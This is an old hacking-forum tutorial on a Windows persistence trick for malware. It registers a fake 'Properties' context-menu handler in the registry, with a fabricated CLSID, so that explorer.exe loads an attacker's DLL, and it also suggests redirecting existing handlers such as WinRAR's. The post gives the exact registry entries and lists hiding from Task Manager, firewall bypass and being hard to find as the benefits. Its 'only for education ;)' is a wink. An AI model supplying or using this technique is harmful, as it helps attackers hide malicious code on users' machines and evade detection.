New Startup
New Startup
ghost | 4649 Reads | Hello folks… i want to demonstrate you a "new" "startup" method. Maybe new is the wrong word but, anyway, i never seen this method elsewhere. Yeah i googled, too! But this differes to the other. Try to google you wont find!
AT the end I ll show you the advanteges :) And after reading you will see why qouteing "new" & "startup"
Ok here we go:
Our target is the Contextmenu, droping down by a rightclick on a file or directory. Lets take a look at mine (File-Contextmenu):
WE run regedit and goto HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\
here are the entries:
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Offline Files]
@=\"{750fdf0e-2a26-11d1-a3ea-080036587f03}\"
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Open With]
@=\"{09799AFB-AD67-11d1-ABCD-00C04FC30936}\"
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Open With EncryptionMenu]
@=\"{A470F8CF-A1E8-4f65-8335-227475AA5C46}\"
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Shell Extension for Malware scanning]
@=\"{45AC2688-0253-4ED8-97DE-B5370FA7D48A}\"
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\WinRAR]
@=\"{B41DB860-8EE4-11D2-9906-E49FADC173CA}\"
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}]
@=\"Start Menu Pin\"
The Dir-Contextmenu's are similar.View yours here: HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\
Now let us look what: … @="{B41DB860-8EE4-11D2-9906-E49FADC173CA}" … means!
We goto: HKEY_CLASSES_ROOT\CLSID\ and search the CLSID
jo, found this:
[HKEY_CLASSES_ROOT\\CLSID\\{B41DB860-8EE4-11D2-9906-E49FADC173CA}]
@=\"WinRAR\"
[HKEY_CLASSES_ROOT\\CLSID\\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\\InProcServer32]
@=\"C:\\\\Programme\\\\WinRAR\\\\rarext.dll\"
\"ThreadingModel\"=\"Apartment\"
Hmmm my first idea was to change teh DLL path. So Explorer.exe would load it when we RightClick(RC) on a file or dir!
Wow it works. But whats that…explorer hangs up! Hmm! BTW the DLL is loaded only 1x The first time you RC on file or dir. Then you cant make changes.To make changes youve to kill explorer.exe and the do your changes. Create new task "explorer.exe" will give you next try.
But how we know, if the the user has Installed WinRar or similar tools we can steal?? Nahh…dont think of it! We do it better! First we create an Windoz usual entry like Properties (file & dir Context) and assign the following CLSID to the standard value:
[HKEY_CLASSES_ROOT\\*\\shellex\\ContextMenuHandlers\\Properties]
@=\"{A41D8860-8EE4-11C2-9906-E49FADC173CB}\"
[HKEY_CLASSES_ROOT\\Folder\\shellex\\ContextMenuHandlers\\Properties]
@=\"{A41D8860-8EE4-11C2-9906-E49FADC173CB}\"
-----------------------------------
And finally the CLSID entry itself:
-----------------------------------
[HKEY_CLASSES_ROOT\\CLSID\\{A41D8860-8EE4-11C2-9906-E49FADC173CB}\\InProcServer32]
@=\"C:\\\\some.dll\"
\"ThreadingModel\"=\"Apartment\"
But ints not the end! Now its your turn to code an working DLL. Just code your Dll like your normal application. Thats enough for the start! Care! Dont code your app/dll in a loop: like a=true; while a=false do begin … if user='crazy' then begin a:=false; end; … end;
Your app/dll must be able to process messages. Else your explorer will hang up! Now ne creative!
=Advanteges= -not shown in taskmanager(injected in explorer.exe) -Firewallbypass (only when the user is stupid enough to let the explorer connect to internet) -hard to locate in registry (without extra tools ;)
=Disadvanteges= -Startup on RightClicking by user
Wo…phu my fingers… I hope i brought you some usefull information! When someone have approvements, message. I did some grammer mistakes? Excuse me. Correct me when you found sth. or if sth not clear enough!
And remember, only for education …;) KNOWLEDGE is POWER and that is what we want!